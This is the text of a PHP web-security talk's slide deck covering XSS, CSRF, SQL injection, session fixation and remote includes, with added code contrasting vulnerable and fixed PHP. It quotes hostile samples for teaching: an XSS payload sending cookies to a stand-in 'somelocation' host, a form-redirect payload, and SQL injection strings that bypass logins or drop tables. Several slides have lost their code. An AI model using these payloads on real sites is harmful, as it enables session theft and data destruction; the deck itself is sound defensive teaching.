Slide 1

Security 101: How not to get hacked

Slide 2

Who Am I
• Systems Architect @ Discovery Communications.
• Previous Speaker @ Atlanta PHP, Zendcon.
• Previously worked on NationalGuard.com’s recruitment application (Security Clearance and all.)

Slide 3

Who knows this guy?

Slide 4

Kevin Mitnick: One of the most famous hackers ever, or was he?

Slide 5

Kevin Mitnick
• Hacked IBM, Motorola, DEC, Nokia, Sun Microsystems, Fujitsu Siemens. (Confirmed)
• Hacked Pacific Bell, California DMV, FBI, Pentagon. (Alleged)

Slide 6

SOCIAL ENGINEERING
• Phishing - Getting information (passwords, account details) by simply asking for it under a false pretext, usually via e-mail or a look-alike login page.
• Baiting - Leaving infected media (USB stick, CDs, a rogue wireless network, etc.) for the target to pick up and plug in, which compromises the system.
• Tailgating - Entering a secured area by following someone who has legitimate access through the door.

Slide 7

So why talk about Social Engineering?

Slide 8

Social Engineering - Tips
• Don’t give out privileged information, ever.
• Know who you’re talking to: ask to call them back on a number you already have, etc.
• Common sense helps a lot.
• Never take anything for granted.
• Don’t pick up disks/USB sticks/etc. you find and insert them into your computer (PC, Mac, or even Linux).

Slide 9

So what is security?

Slide 10

Security is a Mindset
• Three Principles:
  • Defense in Depth
  • Least Privilege
  • Least Complicated
• Trust Nothing, Assume Nothing.
Defense in Depth - Redundant safeguards are valuable.
Least Privilege - Grant as little freedom as possible.
Least Complicated - Complexity breeds mistakes.
(From Shiflett’s Evolution of Web Security)

Slide 11

Security In Practice
• Working with data has two practices:
  • Filter Input
  • Escape Output
• Working with people has many, many more!

Slide 12

Server Security
http://flic.kr/p/9SD2tZ by Rob Allan (Akrabat)
This is actually Ed Finkler; he used to run the Spaz project and is a member of several other open source projects. Because of the context, though, most will assume he’s a hacker. Setting up a context so that people fill in the wrong assumption is called pretexting.

Slide 13

Server Side Security
• Install the Suhosin patch.
• Be smart about your passwords.
• Disable register_globals, magic_quotes, etc. (Both were removed in PHP 5.4; on older PHP turn them off in php.ini.)
• Never run PHP/Apache/Nginx/etc. as root/administrator.
• Keep up with patches.
This is a long topic; I’m not going to fully cover it. If you don’t know what you’re doing, PLEASE hire a sysadmin. Sysadmins need love too!

Slide 14

Server Side Security
Only true security option: unplug the machine from the internet, telephone, power, etc. and never power it back on.

Slide 15

What we’re all here for

Slide 16

Top Vulnerabilities for Web Apps
• Cross Site Scripting - 68%
• Unintentional Disclosure - 66%
• Session Fixation / Hijacking - 53%
• SQL Injection - 32%
Data according to Veracode State of Software Security v4. Sample group is 9,910 apps.

Slide 17

Cross Site Scripting (XSS)
• Inclusion of dynamic code (script) in your page via an unfiltered point of entry.
• Can be one-time / reflected (a GET or POST parameter echoed back in the response).
• Can be permanent / stored (blog post, blog comment, forum post, etc. saved to the database and shown to every visitor).

Slide 18

An Example
---
url?user=%3Cscript%3E%2F%2FDo%20Something%3C%2Fscript%3E
decodes to
user=<script>//Do Something</script>
The page echoed the user parameter straight into its HTML, so the browser receives a real <script> element and runs it. (Only the tail of that PHP snippet, "; ?>, survived extraction.)

Slide 19

Whoa
• If this were a crafted link, 1 person could be exploited.
• If this is stored in a forum/blog, many people could be exploited.

Slide 20

The Danger?
cookies ---
document.location = 'http://somelocation/steal/?cookie=' + encodeURIComponent(document.cookie)
form data ---
document.getElementById('form').action = 'http://somelocation/stealform'
Redirecting a form means changing its action (the URL it submits to); target only picks the window. Cookies set with the HttpOnly flag are not readable from document.cookie, which blunts the first payload but not the second.

Slide 21

XSS Prevention
• Filter input using strip_tags (for fields that should never contain markup).
• Escape output using htmlspecialchars($value, ENT_QUOTES, 'UTF-8'), so that quotes are escaped too and the value is safe inside attributes as well as text.
• Escaping is context-specific: HTML text and attributes get htmlspecialchars; a value placed inside a JavaScript string or a URL needs JSON or URL encoding instead.

Slide 22

Special Chars
---
url?user=%3Cscript%3EDo%20Something%3C%2Fscript%3E
or
user = <script>Do Something</script>
After htmlspecialchars the page contains &lt;script&gt;Do Something&lt;/script&gt;, which the browser displays literally as <script>Do Something</script> and does not execute.

Slide 23

Strip Tags
---
url?user=%3Cscript%3EDo%20Something%3C%2Fscript%3E
or
user = <script>Do Something</script>
After strip_tags only the text remains: Do Something
strip_tags removes markup; it is not an escape. Anything that is not a tag (for example a quote that closes an attribute you put the value into) passes straight through, so the output still needs htmlspecialchars.
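The slides show the escaped and stripped results but not the code that produces them. The following is an added example, not from the original deck, rendering one constructed attacker-supplied value the vulnerable way, escaped, stripped-then-escaped, and inside an attribute (where ENT_QUOTES is what keeps a single quote from breaking out of the value):

```php
<?php
// Added example (not from the slides): the same untrusted value rendered four ways.
declare(strict_types=1);

// Constructed attacker-controlled input, as it would arrive in $_GET['user'].
$user = '<script>document.location="http://somelocation/steal/?c="+document.cookie</script>';

// 1. Vulnerable: the raw parameter lands in the HTML and the browser executes it.
function render_vulnerable(string $user): string
{
    return '<p>Hello ' . $user . '</p>';
}

// 2. Escape on output: < > & " ' become entities, so the markup is shown as text.
function render_escaped(string $user): string
{
    return '<p>Hello ' . htmlspecialchars($user, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</p>';
}

// 3. strip_tags drops the tags (lossy, fine for a "no markup allowed" field),
//    but the remaining text must still be escaped on the way out.
function render_stripped(string $user): string
{
    return '<p>Hello ' . htmlspecialchars(strip_tags($user), ENT_QUOTES, 'UTF-8') . '</p>';
}

// 4. Attribute context: without ENT_QUOTES a quote in the value would end the
//    attribute and the attacker could add onmouseover= or similar.
function render_attribute(string $user): string
{
    return '<input name="user" value="' . htmlspecialchars($user, ENT_QUOTES, 'UTF-8') . '">';
}

echo render_vulnerable($user), PHP_EOL;
echo render_escaped($user), PHP_EOL;
echo render_stripped($user), PHP_EOL;
echo render_attribute($user), PHP_EOL;
```

Run it from the command line and compare the four lines: only the first contains a live <script> element; the second and fourth contain &lt;script&gt; entities, and the third has no tags at all but is still escaped in case the stripped text contained quotes.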

Slide 24

CSRF - Cross Site Request Forgery
• Uses your own login / cookies / sessions / etc. against you.
• Makes requests in the background (that have side effects) without your knowledge.
• Can be done by a malicious site, or via XSS.

Slide 25

Prevention
• Prevent CSRF on your state-changing forms by:
  • Using tokens (a secret the attacker’s page cannot read, sent with every POST).
  • Never changing state on a GET request.

Slide 26

Using Tokens on your Forms
<input type="hidden" name="token" value="<?php echo htmlspecialchars($_SESSION['token'], ENT_QUOTES, 'UTF-8'); ?>" />
---
if (!isset($_POST['token'], $_SESSION['token'])
    || !hash_equals($_SESSION['token'], (string) $_POST['token'])) {
    // ABORT ABORT
}
Compare with hash_equals (constant time, string-only) rather than !=, which uses loose comparison and is timing-dependent.
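The slide shows the check but not how the token gets into the session. Below is an added example, not from the original deck, that issues one token per session with random_bytes, embeds it in the form, and verifies it on POST before doing anything with side effects (the form and action are constructed placeholders):

```php
<?php
// Added example (not from the slides): CSRF token issued per session,
// embedded in the form, and checked with a constant-time compare.
declare(strict_types=1);

session_start();

// Issue a token once per session; random_bytes() is a CSPRNG.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field for the form. Escaped on output even though we generated it.
function csrf_field(): string
{
    return '<input type="hidden" name="token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Verify a submitted token. hash_equals avoids timing leaks and, unlike !=,
// never falls back to loose comparison against null or an array.
function csrf_verify($submitted): bool
{
    if (!is_string($submitted) || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

if (($_SERVER['REQUEST_METHOD'] ?? 'GET') === 'POST') {
    if (!csrf_verify($_POST['token'] ?? null)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... perform the state-changing action (transfer, delete, etc.) here ...
    exit('OK');
}

// Constructed placeholder form; every state-changing form gets the field.
echo '<form method="post">' . csrf_field()
   . '<button type="submit">Transfer</button></form>';
```

A page the attacker controls can make the victim’s browser send the cookie, but it cannot read the token out of your form (same-origin policy), so the forged POST fails the check. Regenerate the token on login along with the session ID.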

Slide 27

SQL Injection
http://xkcd.com/327/

Slide 28

What is SQL Injection?
• Allowing arbitrary SQL statements to alter the intended “flow” of your query.
• Can change your conditions in unexpected ways:
  admin' or 1 = 1; --
• Can perform actions:
  admin'; drop table stuff; --
(Stacked statements like the second only run if the database driver executes multiple statements per call; the first works everywhere.)

Slide 29

Some Insecure Code
url?userid=42
becomes
SELECT * FROM users WHERE userid = '42';

Slide 30

So why is it insecure?
url?userid=42'%3B%20drop%20table%20users%3B%20--
OR
userid = 42'; drop table users; --
becomes
SELECT * FROM users WHERE userid = '42'; drop table users;-- ';
The quote closes the string literal, the semicolon ends the statement, and -- comments out the closing quote the code appended, so the whole thing parses.

Slide 31

Some Alternatives
• Specific to this example:
  • Cast to integer.
• Otherwise:
  • Filter input.
  • Use prepared statements (preferred: the value never becomes part of the SQL text).
  • mysql_real_escape_string (last resort; the mysql_* extension was deprecated in PHP 5.5 and removed in PHP 7, and escaping only works when the value is inside quotes).

Slide 32

Cast to Int
url?userid=42'%3B%20drop%20table%20users%3B%20--
OR
userid = 42'; drop table users; --
$userid = (int) $_GET['userid'];  // 42: the cast stops at the first non-digit
SELECT * FROM users WHERE userid = '42';

Slide 33

Filtering
url?userid=42'%3B%20drop%20table%20users%3B%20--
OR
userid = 42'; drop table users; --
After filtering the value down to an integer:
SELECT * FROM users WHERE userid = '42';

Slide 34

Prepared Statements
url?userid=42'%3B%20drop%20table%20users%3B%20--
OR
userid = 42'; drop table users; --
<?php
// $db is the PDO connection (name assumed; the connection line did not survive extraction)
$stmt = $db->prepare("SELECT * FROM users WHERE userid = :userid");
$stmt->execute(array(':userid' => $_GET['userid']));
$result = $stmt->fetchAll();
?>
SELECT * FROM users WHERE userid = :userid;
The bound value is sent separately from the SQL text, so the quote and the trailing statement are just characters in a string that matches no userid.

Slide 35

Tying it all together
url?userid=42'%3B%20drop%20table%20users%3B%20--
OR
userid = 42'; drop table users; --
<?php
// $db is the PDO connection (name assumed; the connection line did not survive extraction)
$userid = (int) $_GET['userid'];   // filter input: 42
$stmt = $db->prepare("SELECT * FROM users WHERE userid = :userid");
$stmt->execute(array(':userid' => $userid));
$result = $stmt->fetchAll();
?>
SELECT * FROM users WHERE userid = :userid;
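To see the difference between slides 29 and 35 run end to end, here is an added example, not from the original deck, that builds the table in an in-memory SQLite database (the two user rows are constructed) and runs the slide’s payload through the string-built query, the prepared statement, and the cast:

```php
<?php
// Added example (not from the slides): string-built query vs prepared statement
// vs integer cast, observed against an in-memory SQLite table.
declare(strict_types=1);

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (userid INTEGER PRIMARY KEY, name TEXT, role TEXT)');
$db->exec("INSERT INTO users VALUES (1, 'admin', 'admin'), (42, 'bob', 'user')");

// Constructed attacker input: the decoded form of url?userid=42'%20OR%201%20%3D%201%20--
$payload = "42' OR 1 = 1 --";

// Vulnerable: the parameter is concatenated into the SQL text, so the quote
// closes the literal and "OR 1 = 1" becomes part of the WHERE clause.
function find_user_vulnerable(PDO $db, string $userid): array
{
    $sql = "SELECT * FROM users WHERE userid = '" . $userid . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Safe: the value is bound, so the SQL structure is fixed before the value arrives.
function find_user_prepared(PDO $db, string $userid): array
{
    $stmt = $db->prepare('SELECT * FROM users WHERE userid = :userid');
    $stmt->execute([':userid' => $userid]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Also safe for an integer column: the cast keeps only the leading digits.
function find_user_cast(PDO $db, string $userid): array
{
    return find_user_prepared($db, (string) (int) $userid);
}

printf(
    "vulnerable: %d rows, prepared: %d rows, cast: %d rows\n",
    count(find_user_vulnerable($db, $payload)),
    count(find_user_prepared($db, $payload)),
    count(find_user_cast($db, $payload))
);
```

The string-built query returns both users (the WHERE clause was rewritten), the prepared statement returns none (no row has the literal userid "42' OR 1 = 1 --"), and the cast returns just userid 42. Swap in the slide’s drop table payload and the first function is the only one where anything but a SELECT can happen.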

Slide 36

A note on Pagination
• Set limits, and make sure a request cannot exceed your limit (clamp page size and offset server-side).
• This is a DoS attack vector: not setting a limit, or too large a limit, lets one request put heavy strain on your application and database servers.

Slide 37

Session Fixation
• Various ways to do this.
• Send someone a link with a session ID in it; if the server accepts IDs from the URL (use_trans_sid / use_only_cookies off) or accepts IDs it never issued (use_strict_mode off), it will create a session under the attacker’s chosen ID.
• Figure out the session identifier generation pattern and switch into other sessions.

Slide 38

Usual Code for Session Fixation

Slide 39

How is this exploited?
• Send the target a URL with PHPSESSID=someknownstring (PHPSESSID is PHP’s default session cookie/parameter name).
• Target accesses the URL and signs in; the server attaches the login to that known ID.
• Access the URL you sent the target, presenting the same ID.
• Profit.

Slide 40

How can it be prevented
• Regenerate the session ID on changes to permission levels: call session_regenerate_id(true) right after a successful login (and on logout), so any ID the attacker planted or captured before login is discarded.
We’ll look at other ways of handling this in another section.

Slide 41

Session Fixation Prevention

Slide 42

Session Hijacking
• Guessing someone’s session ID.
• Grabbing their cookie (think XSS).
• Someone sharing a link with the PHPSESSID on it.

Slide 43

How to Prevent Hijacking
• Fingerprint the User-Agent (defense in depth only: an attacker who stole the cookie through XSS can copy the User-Agent as well).
• Use a token.
• Mark the session cookie HttpOnly and Secure so it is not readable from script and never sent over plain HTTP.

Slide 44

Fingerprint the UA

Slide 45

Using a Token

Slide 46

Fun with Remote Code Includes
• PHP used to allow include() of remote URLs whenever allow_url_fopen was on (its default). Since PHP 5.2 a separate allow_url_include setting governs include/require and defaults to Off, but allow_url_fopen still defaults to On, and a path built from user input remains dangerous either way (local file inclusion, php:// wrappers).

Slide 47

A Quick Example

Slide 48

How to fix
• Set allow_url_include to Off.
• Maybe set allow_url_fopen to Off (breaks file_get_contents() on URLs; use curl for that instead).
• Quit doing it wrong: the ini settings only remove the remote variant. Never build an include path from request data.

Slide 49

Fix the Underlying Problem

Slide 50

Some Do’s before Pizza & Beer

Slide 51

Sanitizing Input
• Use strip_tags before storing data or processing it, for fields that should never contain markup (it is lossy; validating the expected format is better where you know it).
• Cast data to its type if you’re not working with strings.
  • (int) $number
  • (bool) $condition
• Do this even on values that are not currently fed from $_GET/$_POST; you never know when that will change.

Slide 52

Escaping Output
• Use htmlspecialchars to convert < to &lt; (and >, &, " and, with ENT_QUOTES, ' to their entities).
• Be aware of where you’re getting the data: anything that was not escaped at the point of output is untrusted, whether it came from a request, the database, or a third-party feed.

Slide 53

On Passwords
• Never store plaintext.
  if (sha1($_POST['pass']) === $db_return)
• Salting is awesome.
  if (sha1('sa' . $_POST['pass'] . 'lt') === $db_return)
• A fixed application-wide salt and a fast hash like sha1 still let an attacker with the database try billions of guesses per second. Use a random per-user salt and a deliberately slow hash: password_hash()/password_verify() (bcrypt) do both.

Slide 54

On Password Complexity
http://xkcd.com/936/

Slide 55

On Password Complexity
• Military standard is strong: 15 characters, ~68.5 bits of entropy.
  • 15 chars long.
  • 2 upper case, 2 lower case letters.
  • 2 numbers.
  • 2 special characters.

Slide 56

Some Important Things
• Filter input & escape output, always.
• Use prepared statements; filter your query params.
• Disable magic_quotes, register_globals, allow_url_include (and allow_url_fopen where you can).
• Give minimum permissions to daemons, processes, people.
• Regenerate your session IDs and use tokens.
• Use common sense.

Slide 57

Thanks